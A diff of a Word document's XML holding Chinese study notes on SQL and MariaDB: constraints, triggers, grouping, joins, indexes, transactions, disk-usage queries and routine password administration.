+        <w:t>ALTER table xxx add CONSTRAINT FK_cno FOREIGN KEY (cno) REFERENCES course(cno)</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4348,10 +3945,7 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t xml:space="preserve">CREATE TRIGGER trigger_name [before | after | instead of] </w:t>
-      </w:r>
-      <w:r>
-        <w:t>[insert | update | delete]</w:t>
+        <w:t>CREATE TRIGGER trigger_name [before | after | instead of] [insert | update | delete]</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4420,8 +4014,6 @@
       </w:r>
       <w:r>
         <w:tab/>
-      </w:r>
-      <w:r>
         <w:t>delete from xiuno_bbs.bbs_user where email=</w:t>
       </w:r>
       <w:proofErr w:type="gramStart"/>
@@ -4492,10 +4084,7 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t xml:space="preserve">instead </w:t>
-      </w:r>
-      <w:r>
-        <w:t>of</w:t>
+        <w:t>instead of</w:t>
       </w:r>
       <w:r>
         <w:t>主要对于视图操作，因为如果视图是多表的时候，不能直接进行</w:t>
@@ -4577,10 +4166,7 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t xml:space="preserve">  [constrai</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">nt constraint_name] </w:t>
+        <w:t xml:space="preserve">  [constraint constraint_name] </w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4745,10 +4331,7 @@
         <w:t>可能导致数据没有被显示出来（</w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve">group </w:t>
-      </w:r>
-      <w:r>
-        <w:t>by</w:t>
+        <w:t>group by</w:t>
       </w:r>
       <w:r>
         <w:t>使用了以后每一个组会只有一行，所以一般都是配合聚合函数进行使用）。</w:t>
@@ -4844,10 +4427,7 @@
         <w:t xml:space="preserve">group by </w:t>
       </w:r>
       <w:r>
-        <w:t>可以</w:t>
-      </w:r>
-      <w:r>
-        <w:t>达到</w:t>
+        <w:t>可以达到</w:t>
       </w:r>
       <w:r>
         <w:t>distinct</w:t>
@@ -4946,10 +4526,7 @@
       </w:r>
       <w:proofErr w:type="gramEnd"/>
       <w:r>
-        <w:t>SELECT AVG(Grade</w:t>
-      </w:r>
-      <w:r>
-        <w:t>)</w:t>
+        <w:t>SELECT AVG(Grade)</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5111,10 +4688,7 @@
         <w:t>，如</w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve">MS SQL </w:t>
-      </w:r>
-      <w:r>
-        <w:t>Server</w:t>
+        <w:t>MS SQL Server</w:t>
       </w:r>
       <w:r>
         <w:t>。有的不允许，如</w:t>
@@ -5204,10 +4778,7 @@
         <w:t>只会选择出</w:t>
       </w:r>
       <w:r>
-        <w:t>tr</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ue</w:t>
+        <w:t>true</w:t>
       </w:r>
       <w:r>
         <w:t>的部分。</w:t>
@@ -5313,10 +4884,7 @@
         <w:t>SELECT-FROM-WHERE</w:t>
       </w:r>
       <w:r>
-        <w:t>语句称为一个查询块。</w:t>
-      </w:r>
-      <w:r>
-        <w:t>将一个查询块嵌套在另一个查询块的</w:t>
+        <w:t>语句称为一个查询块。将一个查询块嵌套在另一个查询块的</w:t>
       </w:r>
       <w:r>
         <w:t>WHERE</w:t>
@@ -5418,10 +4986,7 @@
       </w:r>
       <w:proofErr w:type="gramEnd"/>
       <w:r>
-        <w:t>CS’ ) AND Sdept &lt;&gt; ‘C</w:t>
-      </w:r>
-      <w:r>
-        <w:t>S‘;</w:t>
+        <w:t>CS’ ) AND Sdept &lt;&gt; ‘CS‘;</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5471,10 +5036,7 @@
         <w:t>PNO</w:t>
       </w:r>
       <w:r>
-        <w:t>。数据库看到了两个字段的相等，但</w:t>
-      </w:r>
-      <w:r>
-        <w:t>是组合成的表格应该是同时又</w:t>
+        <w:t>。数据库看到了两个字段的相等，但是组合成的表格应该是同时又</w:t>
       </w:r>
       <w:r>
         <w:t xml:space="preserve">P.PNO </w:t>
@@ -5584,10 +5146,7 @@
     <w:p/>
     <w:p>
       <w:r>
-        <w:t xml:space="preserve">select rowid from Courses where </w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">CourseId=CourseId and ClassId=ClassId and </w:t>
+        <w:t xml:space="preserve">select rowid from Courses where CourseId=CourseId and ClassId=ClassId and </w:t>
       </w:r>
       <w:proofErr w:type="gramStart"/>
       <w:r>
@@ -5635,10 +5194,7 @@
       </w:r>
       <w:proofErr w:type="gramEnd"/>
       <w:r>
-        <w:t xml:space="preserve"> (select * from Courses as A  where T1.CourseId=A.CourseId and T1.Teachin</w:t>
-      </w:r>
-      <w:r>
-        <w:t>gDay=A.TeachingDay and T1.ClassId=A.ClassId and T1.ClassRemaining!=A.ClassRemaining) group by CourseId</w:t>
+        <w:t xml:space="preserve"> (select * from Courses as A  where T1.CourseId=A.CourseId and T1.TeachingDay=A.TeachingDay and T1.ClassId=A.ClassId and T1.ClassRemaining!=A.ClassRemaining) group by CourseId</w:t>
       </w:r>
     </w:p>
     <w:p/>
@@ -5670,10 +5226,7 @@
       </w:r>
       <w:r>
         <w:tab/>
-        <w:t>(SELECT * FROM SC WHERE Student.Sno=SC.Sno AND Cour</w:t>
-      </w:r>
-      <w:r>
-        <w:t>se.Cno=Cno));</w:t>
+        <w:t>(SELECT * FROM SC WHERE Student.Sno=SC.Sno AND Course.Cno=Cno));</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5947,10 +5500,7 @@
     <w:p/>
     <w:p>
       <w:r>
-        <w:t>集函数（把一群输</w:t>
-      </w:r>
-      <w:r>
-        <w:t>入集在一起，得到一个输出）：</w:t>
+        <w:t>集函数（把一群输入集在一起，得到一个输出）：</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -6263,10 +5813,7 @@
         <w:t>右外连接</w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve"> RIGHT O</w:t>
-      </w:r>
-      <w:r>
-        <w:t>UTER JOIN</w:t>
+        <w:t xml:space="preserve"> RIGHT OUTER JOIN</w:t>
       </w:r>
       <w:r>
         <w:tab/>
@@ -6376,10 +5923,7 @@
     <w:p>
       <w:r>
         <w:tab/>
-        <w:t xml:space="preserve">on </w:t>
-      </w:r>
-      <w:r>
-        <w:t>&lt;predicate&gt;</w:t>
+        <w:t>on &lt;predicate&gt;</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -6512,10 +6056,7 @@
     <w:p/>
     <w:p>
       <w:r>
-        <w:t>唯一索引</w:t>
-      </w:r>
-      <w:r>
-        <w:t>允许有空值存在，但是只能存在一个。主键索引不允许使用空值。</w:t>
+        <w:t>唯一索引允许有空值存在，但是只能存在一个。主键索引不允许使用空值。</w:t>
       </w:r>
     </w:p>
     <w:p/>
@@ -6595,10 +6136,7 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t>逻辑主键（代理主键）：</w:t>
-      </w:r>
-      <w:r>
-        <w:t>在数据库表中采用一个与当前表中逻辑信息无关的字段作为其主键，称为</w:t>
+        <w:t>逻辑主键（代理主键）：在数据库表中采用一个与当前表中逻辑信息无关的字段作为其主键，称为</w:t>
       </w:r>
       <w:r>
         <w:t>“</w:t>
@@ -6706,10 +6244,7 @@
     <w:p>
       <w:r>
         <w:tab/>
-        <w:t xml:space="preserve">  add constraint department_fk_mgr_ssn</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> foreign key (mgr_ssn) references employee(ssn) initially deferred; </w:t>
+        <w:t xml:space="preserve">  add constraint department_fk_mgr_ssn foreign key (mgr_ssn) references employee(ssn) initially deferred; </w:t>
       </w:r>
     </w:p>
     <w:p/>
@@ -6744,10 +6279,7 @@
         <w:t>2.</w:t>
       </w:r>
       <w:r>
-        <w:t>永远也不要更新主键。实际上，因为主键除了唯一地标识一行之外，再没有其他的用途了，所以也就没有理由去对它更新。如果主键需要更新，则说明主键应对用户</w:t>
-      </w:r>
-      <w:r>
-        <w:t>无意义的原则被违反了。</w:t>
+        <w:t>永远也不要更新主键。实际上，因为主键除了唯一地标识一行之外，再没有其他的用途了，所以也就没有理由去对它更新。如果主键需要更新，则说明主键应对用户无意义的原则被违反了。</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -6866,10 +6398,7 @@
         </w:rPr>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">select *  from sc group by </w:t>
-      </w:r>
-      <w:r>
-        <w:t>cno,sno; cno</w:t>
+        <w:t>select *  from sc group by cno,sno; cno</w:t>
       </w:r>
       <w:r>
         <w:t>与</w:t>
@@ -6943,10 +6472,7 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t>+--------------+--------------+------+-----+---------+------</w:t>
-      </w:r>
-      <w:r>
-        <w:t>----------+</w:t>
+        <w:t>+--------------+--------------+------+-----+---------+----------------+</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -6969,10 +6495,7 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t xml:space="preserve">| name </w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">        | </w:t>
+        <w:t xml:space="preserve">| name         | </w:t>
       </w:r>
       <w:proofErr w:type="gramStart"/>
       <w:r>
@@ -7019,10 +6542,7 @@
       </w:r>
       <w:proofErr w:type="gramEnd"/>
       <w:r>
-        <w:t>10)  | YES  |     | NU</w:t>
-      </w:r>
-      <w:r>
-        <w:t>LL    |                |</w:t>
+        <w:t>10)  | YES  |     | NULL    |                |</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -7066,10 +6586,7 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t>+--------------</w:t>
-      </w:r>
-      <w:r>
-        <w:t>+--------------+------+-----+---------+----------------+</w:t>
+        <w:t>+--------------+--------------+------+-----+---------+----------------+</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -7138,10 +6655,7 @@
         <w:t>约束，请使用下面的</w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve"> SQL</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
+        <w:t xml:space="preserve"> SQL </w:t>
       </w:r>
       <w:r>
         <w:t>语法：</w:t>
@@ -7291,10 +6805,7 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t xml:space="preserve">PRIMARY KEY </w:t>
-      </w:r>
-      <w:r>
-        <w:t>(O_Id),</w:t>
+        <w:t>PRIMARY KEY (O_Id),</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -7381,8 +6892,6 @@
     <w:p>
       <w:r>
         <w:tab/>
-      </w:r>
-      <w:r>
         <w:t xml:space="preserve">CONSTRAINT FK_sno FOREIGN KEY (sno) REFERENCES student, </w:t>
       </w:r>
     </w:p>
@@ -7426,10 +6935,7 @@
         <w:t>,</w:t>
       </w:r>
       <w:r>
-        <w:t>要查系统表得到自动分配的那个约束名才</w:t>
-      </w:r>
-      <w:r>
-        <w:t>能删除</w:t>
+        <w:t>要查系统表得到自动分配的那个约束名才能删除</w:t>
       </w:r>
       <w:r>
         <w:t xml:space="preserve">. </w:t>
@@ -7563,10 +7069,7 @@
         <w:t>.</w:t>
       </w:r>
       <w:r>
-        <w:t>在该表中</w:t>
-      </w:r>
-      <w:r>
-        <w:t>每一个值或者每一组值都将是唯一的</w:t>
+        <w:t>在该表中每一个值或者每一组值都将是唯一的</w:t>
       </w:r>
       <w:r>
         <w:t>.</w:t>
@@ -7674,10 +7177,7 @@
         <w:t xml:space="preserve"> (CASCADE)</w:t>
       </w:r>
       <w:r>
-        <w:t>，删除被参照关系元组时，相应删除对应的参照关系的相应元组。修改被参照关系主码值，相</w:t>
-      </w:r>
-      <w:r>
-        <w:t>应修改对应的参照关系的相应元组。</w:t>
+        <w:t>，删除被参照关系元组时，相应删除对应的参照关系的相应元组。修改被参照关系主码值，相应修改对应的参照关系的相应元组。</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -7733,10 +7233,7 @@
         <w:t>、</w:t>
       </w:r>
       <w:r>
-        <w:t>CASC</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ADE</w:t>
+        <w:t>CASCADE</w:t>
       </w:r>
       <w:r>
         <w:t>、</w:t>
@@ -7959,10 +7456,7 @@
         <w:t>1440</w:t>
       </w:r>
       <w:r>
-        <w:t>条记录大约只需要查</w:t>
-      </w:r>
-      <w:r>
-        <w:t>询</w:t>
+        <w:t>条记录大约只需要查询</w:t>
       </w:r>
       <w:r>
         <w:t>3.5</w:t>
@@ -8014,10 +7508,7 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t xml:space="preserve">MariaDB </w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">[collage]&gt; insert into ITclass </w:t>
+        <w:t xml:space="preserve">MariaDB [collage]&gt; insert into ITclass </w:t>
       </w:r>
       <w:proofErr w:type="gramStart"/>
       <w:r>
@@ -8061,10 +7552,7 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t xml:space="preserve">  ('C</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">hun', 'SQL', 75), ('Chun', 'Tuning', 73), </w:t>
+        <w:t xml:space="preserve">  ('Chun', 'SQL', 75), ('Chun', 'Tuning', 73), </w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -8099,10 +7587,7 @@
     <w:p/>
     <w:p>
       <w:r>
-        <w:t>MariaDB [collage</w:t>
-      </w:r>
-      <w:r>
-        <w:t>]&gt; select * from ITclas;</w:t>
+        <w:t>MariaDB [collage]&gt; select * from ITclas;</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -8153,10 +7638,7 @@
       </w:r>
       <w:proofErr w:type="gramEnd"/>
       <w:r>
-        <w:t xml:space="preserve"> | 1    | 2    </w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">     | 5    | 3    | 4            | 6         | 7         |</w:t>
+        <w:t xml:space="preserve"> | 1    | 2         | 5    | 3    | 4            | 6         | 7         |</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -8181,10 +7663,7 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t>后来我把这两条测试数据都删</w:t>
-      </w:r>
-      <w:r>
-        <w:t>除了结果从</w:t>
+        <w:t>后来我把这两条测试数据都删除了结果从</w:t>
       </w:r>
       <w:r>
         <w:t>3</w:t>
@@ -8286,10 +7765,7 @@
         <w:t>”</w:t>
       </w:r>
       <w:r>
-        <w:t>的字段出现在条件表达式中，将</w:t>
-      </w:r>
-      <w:r>
-        <w:t>使条件计算为</w:t>
+        <w:t>的字段出现在条件表达式中，将使条件计算为</w:t>
       </w:r>
       <w:r>
         <w:t>NULL</w:t>
@@ -8403,10 +7879,7 @@
         <w:t>保存点</w:t>
       </w:r>
       <w:r>
-        <w:t>(Savepo</w:t>
-      </w:r>
-      <w:r>
-        <w:t>int):</w:t>
+        <w:t>(Savepoint):</w:t>
       </w:r>
       <w:r>
         <w:t>事务集中的一个临时占位符，可进行回滚。</w:t>
@@ -8446,356 +7919,335 @@
     </w:p>
     <w:p>
       <w:r>
+        <w:t xml:space="preserve">insert into department (dno, dept_name, mgr_ssn) </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>values(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t>'101', 'HR', '10001');</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">insert into department (dno, dept_name, mgr_ssn) </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>values(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t>'102', 'FI', '20001');</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:r>
         <w:t xml:space="preserve">insert into </w:t>
       </w:r>
-      <w:r>
-        <w:t xml:space="preserve">department (dno, dept_name, mgr_ssn) </w:t>
-      </w:r>
       <w:proofErr w:type="gramStart"/>
       <w:r>
-        <w:t>values(</w:t>
+        <w:t>employee(</w:t>
       </w:r>
       <w:proofErr w:type="gramEnd"/>
       <w:r>
-        <w:t>'101', 'HR', '10001');</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">insert into department (dno, dept_name, mgr_ssn) </w:t>
+        <w:t>ssn, name, salary, dno) values('10001','Zhao',20000, '101');</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">insert into </w:t>
       </w:r>
       <w:proofErr w:type="gramStart"/>
       <w:r>
-        <w:t>values(</w:t>
+        <w:t>employee(</w:t>
       </w:r>
       <w:proofErr w:type="gramEnd"/>
       <w:r>
-        <w:t>'102', 'FI', '20001');</w:t>
-      </w:r>
-    </w:p>
-    <w:p/>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">insert into </w:t>
+        <w:t>ssn, name, salary, dno) values('20001','Singh',19000, '102');</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>commit</w:t>
+      </w:r>
+      <w:r>
+        <w:t>；</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p/>
+    <w:p/>
+    <w:p>
+      <w:r>
+        <w:t>mysql</w:t>
+      </w:r>
+      <w:r>
+        <w:t>中如何查看某个数据库或表占用的磁盘空间：</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>查整个库的状态：</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>select concat(truncate(sum(data_length)/1024/1024,2),'MB') as data_size,</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>concat(truncate(sum(max_data_length)/1024/1024,2),'MB') as max_data_size,</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>concat(truncate(sum(data_free)/1024/1024,2),'MB') as data_free,</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>concat(truncate(sum(index_length)/1024/1024,2),'MB') as index_size</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>from information_</w:t>
       </w:r>
       <w:proofErr w:type="gramStart"/>
       <w:r>
-        <w:t>employee(</w:t>
+        <w:t>schema.tables</w:t>
       </w:r>
       <w:proofErr w:type="gramEnd"/>
       <w:r>
-        <w:t>ssn, name, salary, dno) values('10001','Zhao',20000, '101');</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">insert into </w:t>
+        <w:t xml:space="preserve"> where TABLE_SCHEMA = 'databasename';</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>查单表：</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>select concat(truncate(sum(data_length)/1024/1024,2),'MB') as data_size,</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>concat(truncate(sum(max_data_length)/1024/1024,2),'MB') as max_data_size,</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>concat(truncate(sum(data_free)/1024/1024,2),'MB') as data_free,</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>concat(truncate(sum(index_length)/1024/1024,2),'MB') as index_size</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>from information_</w:t>
       </w:r>
       <w:proofErr w:type="gramStart"/>
       <w:r>
-        <w:t>employee(</w:t>
+        <w:t>schema.tables</w:t>
       </w:r>
       <w:proofErr w:type="gramEnd"/>
       <w:r>
-        <w:t>ssn, n</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ame, salary, dno) values('20001','Singh',19000, '102');</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>commit</w:t>
-      </w:r>
-      <w:r>
-        <w:t>；</w:t>
-      </w:r>
-    </w:p>
-    <w:p/>
-    <w:p/>
-    <w:p/>
-    <w:p>
+        <w:t xml:space="preserve"> where TABLE_NAME = 'tablename';</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p/>
+    <w:p>
+      <w:r>
+        <w:t>程序每一次开启一个实例就需要一个端口，默认端口与其余端口都只能被一个实例占用。</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p/>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">MariaDB [jwc]&gt; describe student.institution; </w:t>
+      </w:r>
+      <w:r>
+        <w:t>没有这条命令，</w:t>
+      </w:r>
+      <w:r>
+        <w:t>xx.xx</w:t>
+      </w:r>
+      <w:r>
+        <w:t>是库</w:t>
+      </w:r>
+      <w:r>
+        <w:t>.</w:t>
+      </w:r>
+      <w:r>
+        <w:t>表。</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>ERROR 1146 (42S02): Table '</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>student.institution</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t>' doesn't exist</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">MariaDB [jwc]&gt; describe student; </w:t>
+      </w:r>
+      <w:r>
+        <w:t>字段只能全部都查看，还有就是</w:t>
+      </w:r>
+      <w:r>
+        <w:t>show columns from ...</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">select </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>count(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t>*) from student where length(name)&gt;35;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">select max(length(name)) from teacher; </w:t>
+      </w:r>
+      <w:r>
+        <w:t>查</w:t>
+      </w:r>
+      <w:r>
+        <w:t>name</w:t>
+      </w:r>
+      <w:r>
+        <w:t>段最长纪录有多长</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:r>
+        <w:t>改密码：</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>update mysql.user set password=password('newpassword') where user='username' #</w:t>
+      </w:r>
+      <w:r>
+        <w:t>别忘了</w:t>
+      </w:r>
+      <w:r>
+        <w:t>set</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>password</w:t>
+      </w:r>
+      <w:r>
+        <w:t>是个加密函数，使用</w:t>
+      </w:r>
+      <w:r>
+        <w:t>MySQLSHA1</w:t>
+      </w:r>
+      <w:r>
+        <w:t>加密。</w:t>
+      </w:r>
+      <w:r>
+        <w:t>old_password()</w:t>
+      </w:r>
+      <w:r>
+        <w:t>使用的是</w:t>
+      </w:r>
+      <w:r>
+        <w:t>Mysql323</w:t>
+      </w:r>
+      <w:r>
+        <w:t>加密：</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>update mysql.user set password='newpassword' where user='username'  update</w:t>
+      </w:r>
+      <w:r>
+        <w:t>语句不支持对多个字段的友好修改</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>如果我们忘记了</w:t>
+      </w:r>
+      <w:r>
+        <w:t>root</w:t>
+      </w:r>
+      <w:r>
+        <w:t>密码，可以在</w:t>
+      </w:r>
+      <w:r>
+        <w:t>/etc/my.cnf</w:t>
+      </w:r>
+      <w:r>
+        <w:t>中</w:t>
+      </w:r>
+      <w:r>
+        <w:t>:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>[msqld]</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>skip-grant-tables</w:t>
+      </w:r>
+      <w:r>
+        <w:t>来登录进去再修改密码</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> #grant</w:t>
+      </w:r>
+      <w:r>
+        <w:t>授予</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>以命令行参数启动</w:t>
+      </w:r>
       <w:r>
         <w:t>mysql</w:t>
       </w:r>
       <w:r>
-        <w:t>中如何查看某个数据库或表占用的磁盘空间：</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>查整个库的状态：</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>select concat(truncate(sum(data_length)/1024/1024,2),'MB') as data_size,</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>concat(truncate(sum(max_data_length)/1024/1024,2),'MB') as max_data_size,</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>concat(</w:t>
-      </w:r>
-      <w:r>
-        <w:t>truncate(sum(data_free)/1024/1024,2),'MB') as data_free,</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>concat(truncate(sum(index_length)/1024/1024,2),'MB') as index_size</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>from information_</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>schema.tables</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> where TABLE_SCHEMA = 'databasename';</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>查单表：</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">select </w:t>
-      </w:r>
-      <w:r>
-        <w:t>concat(truncate(sum(data_length)/1024/1024,2),'MB') as data_size,</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>concat(truncate(sum(max_data_length)/1024/1024,2),'MB') as max_data_size,</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>concat(truncate(sum(data_free)/1024/1024,2),'MB') as data_free,</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>concat(truncate(sum(index_length)/1024/1024,2),'MB')</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> as index_size</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>from information_</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>schema.tables</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> where TABLE_NAME = 'tablename';</w:t>
-      </w:r>
-    </w:p>
-    <w:p/>
-    <w:p/>
-    <w:p>
-      <w:r>
-        <w:t>程序每一次开启一个实例就需要一个端口，默认端口与其余端口都只能被一个实例占用。</w:t>
-      </w:r>
-    </w:p>
-    <w:p/>
-    <w:p/>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">MariaDB [jwc]&gt; describe student.institution; </w:t>
-      </w:r>
-      <w:r>
-        <w:t>没有这条命令，</w:t>
-      </w:r>
-      <w:r>
-        <w:t>xx.xx</w:t>
-      </w:r>
-      <w:r>
-        <w:t>是库</w:t>
-      </w:r>
-      <w:r>
-        <w:t>.</w:t>
-      </w:r>
-      <w:r>
-        <w:t>表。</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>ERROR 1146 (42S02): Table '</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>student.institution</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t>' doesn't exist</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">MariaDB [jwc]&gt; describe student; </w:t>
-      </w:r>
-      <w:r>
-        <w:t>字段只能全部都查看，还有就是</w:t>
-      </w:r>
-      <w:r>
-        <w:t>show columns from ...</w:t>
-      </w:r>
-    </w:p>
-    <w:p/>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">select </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>count(</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t>*) from student where length(name)&gt;35;</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">select max(length(name)) from teacher; </w:t>
-      </w:r>
-      <w:r>
-        <w:t>查</w:t>
-      </w:r>
-      <w:r>
-        <w:t>name</w:t>
-      </w:r>
-      <w:r>
-        <w:t>段最长纪录有多长</w:t>
-      </w:r>
-    </w:p>
-    <w:p/>
-    <w:p>
-      <w:r>
-        <w:t>改密码：</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>update mysql.user set password=password('newpassword') where user='username</w:t>
-      </w:r>
-      <w:r>
-        <w:t>' #</w:t>
-      </w:r>
-      <w:r>
-        <w:t>别忘了</w:t>
-      </w:r>
-      <w:r>
-        <w:t>set</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>password</w:t>
-      </w:r>
-      <w:r>
-        <w:t>是个加密函数，使用</w:t>
-      </w:r>
-      <w:r>
-        <w:t>MySQLSHA1</w:t>
-      </w:r>
-      <w:r>
-        <w:t>加密。</w:t>
-      </w:r>
